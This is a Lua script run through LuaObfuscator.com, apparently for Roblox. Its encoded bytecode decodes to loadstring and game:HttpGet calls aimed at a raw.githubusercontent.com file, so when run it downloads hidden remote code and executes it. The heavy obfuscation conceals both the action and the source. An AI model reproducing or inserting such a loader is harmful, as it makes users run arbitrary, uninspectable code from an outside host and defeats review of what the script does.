--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v116=v5(v86,v19);v19=nil;return v116;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((1497 -(282 + 595)) -(555 + 64)))) + 1)) ;return v87-(v87%(932 -(857 + 74))) ;else local v88=(570 -(367 + (1838 -(1523 + 114))))^(v32-(928 -(214 + 713))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(0 + (0 -0))) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1271 -(226 + (1161 -(32 + 85))) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v41 * (31011612 -(14234746 -(87 + 263)))) + (v40 * 65536) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + (791 -(368 + 423)) ,49 -29 ) * ((2 + (0 -0))^(127 -95))) + v42 ;local v46=v20(v43,973 -(802 + 150) ,83 -52 );local v47=((v20(v43,32)==(1 -0)) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (18 -(10 + 8)) ;else v46=1 -0 ;v44=(4566 -3379) -(1069 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * (1/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/(2^(52 + 0)))) ;end local function v25(v48) local v49;if  not v48 then local v89=442 -(416 + (464 -(145 + 293))) ;while true do if (v89==(0 -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((431 -(44 + 386)) -0) );v18=v18 + v48 ;local v50={};for v67=1, #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90== #"!") then if (v91== #"]") then v92=(function() return v93()~=(0 -0) ;end)();elseif (v91==(1823 -(1483 + 338))) then v92=(function() return v94();end)();elseif (v91~= #"91(") then else v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90==0) then local v122=(function() return 1695 -(1229 + 466) ;end)();while true do if (0~=v122) then else v91=(function() return v93();end)();v92=(function() return nil;end)();v122=(function() return 579 -(386 + 192) ;end)();end if ((1207 -(696 + 510))~=v122) then else v90=(function() return  #">";end)();break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do local v115=(function() return 0;end)();while true do if (v115==(0 -0)) then if (v107~=1) then else local v125=(function() return 0;end)();while true do if (v125==(1262 -(1091 + 171))) then while true do if (v98==0) then v99=(function() return v100();end)();if (v101(v99, #"[", #",")~=0) then else local v155=(function() return 0 + 0 ;end)();local v156=(function() return;end)();local v157=(function() return;end)();local v158=(function() return;end)();while true do if (v155~=3) then else if (v101(v157, #"asd", #"19(")== #"~") then v158[ #"?id="]=(function() return v104[v158[ #"0313"]];end)();end v105[v106]=(function() return v158;end)();break;end if (v155==(0 -0)) then local v188=(function() return 0;end)();while true do if (v188==0) then v156=(function() return v101(v99,6 -4 , #"gha");end)();v157=(function() return v101(v99, #".com",6);end)();v188=(function() return 1;end)();end if ((375 -(123 + 251))==v188) then v155=(function() return 1;end)();break;end end end if (v155~=1) then else v158=(function() return {v102(),v102(),nil,nil};end)();if (v156==(0 -0)) then local v192=(function() return 698 -(208 + 490) ;end)();local v193=(function() return;end)();while true do if (v192==(0 + 0)) then v193=(function() return 0 + 0 ;end)();while true do if (v193==(836 -(660 + 176))) then v158[ #"xnx"]=(function() return v102();end)();v158[ #"http"]=(function() return v102();end)();break;end end break;end end elseif (v156== #"[") then v158[ #"-19"]=(function() return v103();end)();elseif (v156==2) then v158[ #"xnx"]=(function() return v103() -(2^16) ;end)();elseif (v156== #"19(") then local v200=(function() return 0 + 0 ;end)();local v201=(function() return;end)();while true do if (0~=v200) then else v201=(function() return 202 -(14 + 188) ;end)();while true do if (v201~=(675 -(534 + 141))) then else v158[ #"91("]=(function() return v103() -((1 + 1)^16) ;end)();v158[ #"?id="]=(function() return v102();end)();break;end end break;end end end v155=(function() return 2 + 0 ;end)();end if (v155==2) then if (v101(v157, #"[", #"<")~= #"~") then else v158[2 + 0 ]=(function() return v104[v158[3 -1 ]];end)();end if (v101(v157,2 -0 ,2)~= #"}") then else v158[ #"19("]=(function() return v104[v158[ #"91("]];end)();end v155=(function() return 3;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end if (v107==(0 -0)) then local v126=(function() return 0 + 0 ;end)();local v127=(function() return;end)();while true do if (v126~=(0 + 0)) then else v127=(function() return 396 -(115 + 281) ;end)();while true do if (1==v127) then v107=(function() return 1;end)();break;end if (v127==(0 -0)) then v98=(function() return 0 + 0 ;end)();v99=(function() return nil;end)();v127=(function() return 2 -1 ;end)();end end break;end end end break;end end end end;end)();local v53=(function() return function(v108,v109,v110) local v111=(function() return 0;end)();local v112=(function() return;end)();while true do if (v111~=0) then else v112=(function() return 0;end)();while true do if (v112~=0) then else local v128=(function() return 0;end)();while true do if (v128==0) then v108[v109-#"[" ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #",",v58 do FlatIdent_24A02,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_24A02,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"-19"]=(function() return v21();end)();for v70= #"\\",v23() do FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_89ECE,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #"\\",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[868 -(550 + 317) ];local v65=v61[(733 -(476 + 255)) -0 ];local v66=v61[3];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1 -0 ;local v77= -(2 -1);local v78={};local v79={...};local v80=v12("#",...) -(2 -1) ;local v81={};local v82={};for v113=1665 -(970 + 695) ,v80 do if ((3286<=4935) and (v113>=v74)) then v78[v113-v74 ]=v79[v113 + (1 -0) ];else v82[v113]=v79[v113 + (1991 -((1712 -(369 + 761)) + 815 + 593)) ];end end local v83=(v80-v74) + (3 -2) ;local v84;local v85;while true do local v114=0 -0 ;while true do if (v114==(2 -1)) then if ((788<=3423) and (v85<=(11 -8))) then if ((v85<=(115 -(4 + 110))) or (4007<741)) then if (v85>((3312 -1488) -(1195 + (1191 -562)))) then do return;end else v82[v84[2]]=v63[v84[3 -(238 -(64 + 174)) ]];end elseif (v85>((35 + 208) -(187 + 54))) then v82[v84[782 -(162 + 618) ]]={};else local v133=0 -0 ;local v134;while true do if ((0 + 0)==v133) then v134=v84[168 -(122 + 44) ];v82[v134]=v82[v134](v13(v82,v134 + (1 -0) ,v77));break;end end end elseif (v85<=((23 -7) -(347 -(144 + 192)))) then if (v85==(3 + 1)) then v82[v84[3 -1 ]]=v84[4 -1 ];else local v137=v84[1 + 1 ];local v138=v82[v84[5 -2 ]];v82[v137 + (1637 -(1373 + (479 -(42 + 174)))) ]=v138;v82[v137]=v138[v84[3 + 0 + 1 ]];end elseif ((v85<=6) or (1155>2350)) then v82[v84[2]]();elseif (v85>(1007 -(374 + 77 + 549))) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==(1 + 0)) then v77=(v145 + v143) -(1 -0) ;v146=0 -0 ;v142=1386 -(317 + 429 + 638) ;end if (((1504 -(363 + 1141)) + 0)==v142) then v143=v84[2 -0 ];v144,v145=v75(v82[v143](v13(v82,v143 + 1 + 0 ,v84[(1924 -(1183 + 397)) -(218 + 123) ])));v142=1582 -(1535 + 46) ;end if ((4029<=4853) and (v142==(2 + 0))) then for v182=v143,v77 do local v183=0 + (0 -0) ;while true do if ((v183==((411 + 149) -(306 + 254))) or (516>3434)) then v146=v146 + 1 + 0 + 0 ;v82[v182]=v144[v146];break;end end end break;end end else local v147=0 -0 ;local v148;local v149;local v150;local v151;local v152;while true do if (v147==(1472 -(899 + 568))) then v148=126 -(116 + 10) ;for v184=v152,v77 do v148=v148 + 1 + 0 ;v82[v184]=v149[v148];end v76=v76 + (1976 -(1913 + 62)) ;v84=v72[v76];v152=v84[4 -2 ];v147=4 + 2 ;end if (v147==(603 -((709 -441) + 335))) then v148=nil;v149,v150=nil;v151=nil;v152=nil;v82[v84[2]]={};v147=291 -(60 + 230) ;end if (v147==(575 -(426 + 146))) then v82[v152 + 1 + 0 ]=v151;v82[v152]=v151[v84[1460 -(282 + 1174) ]];v76=v76 + (812 -(569 + 242)) ;v84=v72[v76];v82[v84[5 -3 ]]=v84[1 + 2 ];v147=1028 -(706 + 318) ;end if ((4046>=3033) and ((1253 -(721 + 530))==v147)) then v82[v84[407 -((2051 -(565 + 1368)) + 287) ]]=v63[v84[1274 -(945 + 326) ]];v76=v76 + (1122 -(118 + 1003)) ;v84=v72[v76];v152=v84[5 -3 ];v151=v82[v84[7 -4 ]];v147=3 + 0 ;end if ((18 -(52 -38))==v147) then v76=v76 + 1 ;v84=v72[v76];v152=v84[702 -(271 + 429) ];v149,v150=v75(v82[v152](v13(v82,v152 + (978 -(553 + 424)) ,v84[3 + 0 ])));v77=(v150 + v152) -(1501 -(1408 + 92)) ;v147=5 + 0 ;end if ((v147==(1 + 0)) or (2719<=1447)) then v76=v76 + ((2748 -(1477 + 184)) -(461 + 625)) ;v84=v72[v76];v82[v84[2 + 0 ]]=v63[v84[6 -3 ]];v76=v76 + (1289 -(993 + 295)) ;v84=v72[v76];v147=1 + 1 ;end if ((v147==(1178 -(418 + 753))) or (4134<3926)) then v84=v72[v76];do return;end break;end if ((v147==((3 -0) + 3)) or (164>=2785)) then v82[v152]=v82[v152](v13(v82,v152 + 1 + 0 ,v77));v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[1331 -(743 + 54 + 532) ]]();v76=v76 + 1 + 0 ;v147=536 -(406 + 123) ;end end end v76=v76 + (1770 -(1749 + 20)) ;break;end if (v114==(0 + 0)) then v84=v72[v76];v85=v84[1];v114=1323 -(1249 + 73) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403533Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F446F6A63616E616C6465616E696D652F736162656D6F736F712D2F726566732F68656164732F6D61696E2F676D7061676F00094Q00077Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
